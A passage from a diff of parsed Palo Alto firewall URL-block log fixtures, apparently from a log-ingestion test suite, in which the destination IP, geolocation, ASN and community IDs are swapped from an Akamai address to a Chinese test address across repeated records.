States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691934100Z", + "original": "Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:13.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8649,26 +8707,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8684,14 +8744,14 @@ "port": 53126, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -8706,7 +8766,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:hYoXMUwV0cAKhYUb4hSHsLUSo1s=" + "community_id": "1:krwQMCJQ69EvT0SHwvfkUr7UpLM=" } }, "threat_category": "unknown", @@ -8751,8 +8811,8 @@ ], "network": { "community_id": [ - "1:0TIOUPyQekmpFSgX6VlMP7asdJs=", - "1:hYoXMUwV0cAKhYUb4hSHsLUSo1s=" + "1:N/dieAql5TxCzoXNfgzjIJkZKbw=", + "1:krwQMCJQ69EvT0SHwvfkUr7UpLM=" ], "transport": "tcp", "application": "ssl", @@ -8791,14 +8851,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768219536Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691939100Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8821,26 +8881,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8856,14 +8918,14 @@ "port": 53127, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -8878,7 +8940,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:al192CljLcXBQ5a9fXhiLM+uAKg=" + "community_id": "1:/CVEkbQULGxkJj6Z7PCr6c76/+Y=" } }, "threat_category": "unknown", @@ -8923,8 +8985,8 @@ ], "network": { "community_id": [ - "1:5CeaDtLLJAW4qpNe5rR3zJ3u1KM=", - "1:al192CljLcXBQ5a9fXhiLM+uAKg=" + "1:mMXXWxoydTVkrT5GSCKjPfEs+Ag=", + "1:/CVEkbQULGxkJj6Z7PCr6c76/+Y=" ], "transport": "tcp", "application": "ssl", @@ -8963,14 +9025,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768223502Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691944200Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8993,26 +9055,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9028,14 +9092,14 @@ "port": 53128, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -9050,7 +9114,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:qI8dj7I/HOk1zkz/wkZBjQ/igsw=" + "community_id": "1:CrsrsZSjYZ4DxsKX0qy4aUQ8Bqw=" } }, "threat_category": "unknown", @@ -9095,8 +9159,8 @@ ], "network": { "community_id": [ - "1:HYgrk1tiJGzjAjdHLQJ54QqqEH0=", - "1:qI8dj7I/HOk1zkz/wkZBjQ/igsw=" + "1:IXdaoAX41Q9+A/P7vOfsMZGvSe0=", + "1:CrsrsZSjYZ4DxsKX0qy4aUQ8Bqw=" ], "transport": "tcp", "application": "ssl", @@ -9135,14 +9199,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768227388Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691950600Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -9165,26 +9229,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9200,14 +9266,14 @@ "port": 53129, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -9222,7 +9288,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:NTrpQ6lfrWcfRCXSB/tQ49z7sOQ=" + "community_id": "1:FfabT8YJw+xGwcSbNocI/5KIsaE=" } }, "threat_category": "unknown", @@ -9267,8 +9333,8 @@ ], "network": { "community_id": [ - "1:8k83tpdWoK7nNJrq4t81UXuScHA=", - "1:NTrpQ6lfrWcfRCXSB/tQ49z7sOQ=" + "1:NOaYZTE87p2BjesLu4fOReXUCYA=", + "1:FfabT8YJw+xGwcSbNocI/5KIsaE=" ], "transport": "tcp", "application": "ssl", @@ -9307,14 +9373,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768231308Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691957100Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -9337,26 +9403,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9372,14 +9440,14 @@ "port": 53130, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -9394,7 +9462,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:93oplAL+YibXq75Qng9iomHp97k=" + "community_id": "1:f/tx3aSbV1g/ORMuTaQEvAiV7sY=" } }, "threat_category": "unknown", @@ -9439,8 +9507,8 @@ ], "network": { "community_id": [ - "1:Ob0VEjF8YeGq1hR7SbX0pZ+5/EI=", - "1:93oplAL+YibXq75Qng9iomHp97k=" + "1:QzX3ERgxyivLA9Tg1tQMwPWMqQc=", + "1:f/tx3aSbV1g/ORMuTaQEvAiV7sY=" ], "transport": "tcp", "application": "ssl", @@ -9479,14 +9547,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768235269Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691963500Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -9509,26 +9577,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9544,14 +9614,14 @@ "port": 53131, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -9566,7 +9636,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:uhEHJXnnMaxBL0QYfNxS8lxZkls=" + "community_id": "1:7hy0Gbrooax3fD1r1xzG6SzBU4g=" } }, "threat_category": "unknown", @@ -9611,8 +9681,8 @@ ], "network": { "community_id": [ - "1:WlDGM7WbDrN83JffZtwB6PNK3Y8=", - "1:uhEHJXnnMaxBL0QYfNxS8lxZkls=" + "1:vgG87dR8hXsX7hyNB8Z/GnCJM/o=", + "1:7hy0Gbrooax3fD1r1xzG6SzBU4g=" ], "transport": "tcp", "application": "ssl", @@ -9651,14 +9721,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768239142Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691969800Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -9681,26 +9751,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9716,14 +9788,14 @@ "port": 53132, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -9738,7 +9810,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:KtlZO5BbsoCg/ymqE05xAvw/iIA=" + "community_id": "1:gAz+t48WkiSa9egQm/6gcOLfWIk=" } }, "threat_category": "unknown", @@ -9783,8 +9855,8 @@ ], "network": { "community_id": [ - "1:U5qBRasQ13RQONeFOyA2+9QbWK8=", - "1:KtlZO5BbsoCg/ymqE05xAvw/iIA=" + "1:Z0YPbs0b9YgyTFb8OV3rfi467Rc=", + "1:gAz+t48WkiSa9egQm/6gcOLfWIk=" ], "transport": "tcp", "application": "ssl", @@ -9823,14 +9895,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768243067Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United 